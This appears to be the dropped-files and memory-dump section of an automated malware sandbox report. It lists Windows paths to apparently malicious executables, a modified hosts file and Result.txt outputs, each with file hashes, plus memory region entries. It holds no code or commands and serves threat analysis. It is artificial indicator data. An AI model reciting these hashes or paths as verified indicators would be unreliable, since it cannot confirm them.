C:\Windows\cbdnbivt\tmyfwky.exe

Filesize
9.7MB

MD5
92ccc1040c87bc86b06db11b87414fdd

SHA1
fec13de19905e9bff1a1665121e2fe44eb4f47e3

SHA256
5352602f0d45a22fabede7c529638c4798cf1ea438b964a3db4fd7ce225326ad

SHA512
d7d46ee2ac19d772be5adcf14ace4fcf0cdc073ad8936dc1134648de62a3eb9e49e5c9d17bcfbda68ddc029e1746a74d485b706cc114e3cbf432c32707171280

Download Submit
C:\Windows\itcctjlje\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\itcctjlje\unptrtjvi\Result.txt

Filesize
1KB

MD5
d10ec18966d0530e93006feb9dfa0f27

SHA1
6b90261cd46ad92448f21ff5b0862b82079ce31a

SHA256
3846e2872134ae7de37129ab4806e0ac15c7683e6038e0431b8aac81afbb5930

SHA512
91f4854e6dc12a2ce1ee2e879f9787689f229d2b941eab42ef5ea9253a7b32d30aac031e3170b832910b42af09be2f763a7ad9582b2c3d75dfcbfcd7fd43d583

Download Submit
C:\Windows\itcctjlje\unptrtjvi\Result.txt

Filesize
2KB

MD5
ceec6f80e2b98de4cf8599e5f084032e

SHA1
00786f9e42d6293328653bbaefa3741c02316ed0

SHA256
4051617f853e5ef7e7e1d382d6469a5413dfda421289d71613b733b273410afe

SHA512
11737f01504f34f227e4e14f50da7d60117a9d96cb62d737f0825849b011d2483c7e198da6c814c239c125ff9f7d592199a6f17286cafd8bf58eb3525703f345

Download Submit
C:\Windows\itcctjlje\unptrtjvi\Result.txt

Filesize
2KB

MD5
6134dad5aa4c5a6bfe836dea78e1a38c

SHA1
91ab3e35afec9add3121eed50ee54415126413a5

SHA256
cbe73117538d1d5c5a7fb2a200ecacbff2d6cd14c1c77eca6a3c1c403d5a52ce

SHA512
e52b6e63687933674648942444e01e6a79a126a9a84aa8dc98deb60d5b35fb6d99f64c7d8b626523a3d5aea0781294d2231fc9e447ee100bc541e1b66c36a41f

Download Submit
C:\Windows\itcctjlje\unptrtjvi\Result.txt

Filesize
2KB

MD5
94a60f5e60238a2ad9573fb873e442dc

SHA1
17963fa28788918ccd02902e0f60f14384193456

SHA256
c14e85fd7247122278121378868466440e2790bccf73e1ab473f5f562796f5f5

SHA512
ea8b24637752e18fa35ae3a866a83ecaba43bcc80392e4ca1f50c3210a7cd7ae607919ea2cb046cff70d451b6436d10fb19050bb89fc5ce1db522810387feadc

Download Submit
C:\Windows\itcctjlje\unptrtjvi\Result.txt

Filesize
2KB

MD5
a6309de739df35fa96c59a139a220147

SHA1
4bba84ad67f3f296be2c46e5eb0e1128647fc2a5

SHA256
39a1d2712795a58c359f2dd609e37c8c0d0d4c594c4648bcd6c5e8f757e5cf25

SHA512
4e206c185d2aac90cdcf67e1aca15061d7b6531ed5c9a4b9492deaa073c2b4266bd1af9c28116d89ba239b413db6a1804e0aaa23236b7ec0245403d7f7bb8a0f

Download Submit
C:\Windows\itcctjlje\unptrtjvi\Result.txt

Filesize
3KB

MD5
996c40a30d337ee224c92953804e6dbf

SHA1
f879f5943342b5f1868f425ae0cd92324ecc9de4

SHA256
6156adcdf53a8fc354a2ecc3f355d2d91034d742a01ba1f8f2673bdad8a23c20

SHA512
974fa36a42686943a5354d0d9713f0f0c2ac59f18b31a7744f35dc8eb2d11e229d8f020b69d755e360774cee41420c7e9d571f677dbd9d01893177ac2c8a6939

Download Submit
C:\Windows\itcctjlje\unptrtjvi\Result.txt

Filesize
4KB

MD5
6a11439e0da1215781873d3798691183

SHA1
c1b968e6f682d36969ecb2964288490abeb45fb5

SHA256
9c786f31703858b7811c5a2eb26455df92d18c602ecea8af9c8292a81fd36402

SHA512
732d25856c22ba8693cd5ef6eeef666877419d14807e1faccc635a66ae6aecc35cead6fc9b8a5a3d10712a84706f44365a5be3e73159bc6812c338ddb594c4ad

Download Submit
C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\itcctjlje\unptrtjvi\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
memory/1384-208-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download
memory/1648-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/1648-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/2004-204-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download
memory/2016-152-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/2016-168-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2024-233-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download
memory/2268-247-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp

Filesize
1.1MB

Download
memory/2268-167-0x000001A4CEF90000-0x000001A4CEFA0000-memory.dmp

Filesize
64KB

Download
memory/2268-756-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp

Filesize
1.1MB

Download
memory/2268-755-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp

Filesize
1.1MB

Download
memory/2268-234-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp

Filesize
1.1MB

Download
memory/2268-500-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp

Filesize
1.1MB

Download
memory/2268-201-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp

Filesize
1.1MB

Download
memory/2268-214-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp

Filesize
1.1MB

Download
memory/2268-498-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp

Filesize
1.1MB

Download
memory/2268-183-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp

Filesize
1.1MB

Download
memory/2268-178-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp

Filesize
1.1MB

Download
memory/2268-497-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp

Filesize
1.1MB

Download
memory/2268-223-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp

Filesize
1.1MB

Download
memory/2268-164-0x00007FF60D6B0000-0x00007FF60D7D0000-memory.dmp

Filesize
1.1MB

Download
memory/2364-194-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download
memory/2580-172-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download
memory/2652-138-0x00007FF6CB1C0000-0x00007FF6CB2AE000-memory.dmp

Filesize
952KB

Download
memory/2652-135-0x00007FF6CB1C0000-0x00007FF6CB2AE000-memory.dmp

Filesize
952KB

Download
memory/2984-221-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download
memory/3240-186-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download
memory/3784-190-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download
memory/3836-217-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download
memory/3960-181-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download
memory/4368-230-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download
memory/4548-226-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download
memory/4604-246-0x0000000000360000-0x0000000000372000-memory.dmp

Filesize
72KB

Download
memory/4640-78-0x0000000001470000-0x00000000014BC000-memory.dmp

Filesize
304KB

Download
memory/4736-199-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download
memory/4800-146-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download
memory/4800-142-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download
memory/4832-176-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download
memory/5032-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/5084-212-0x00007FF72E930000-0x00007FF72E98B000-memory.dmp

Filesize
364KB

Download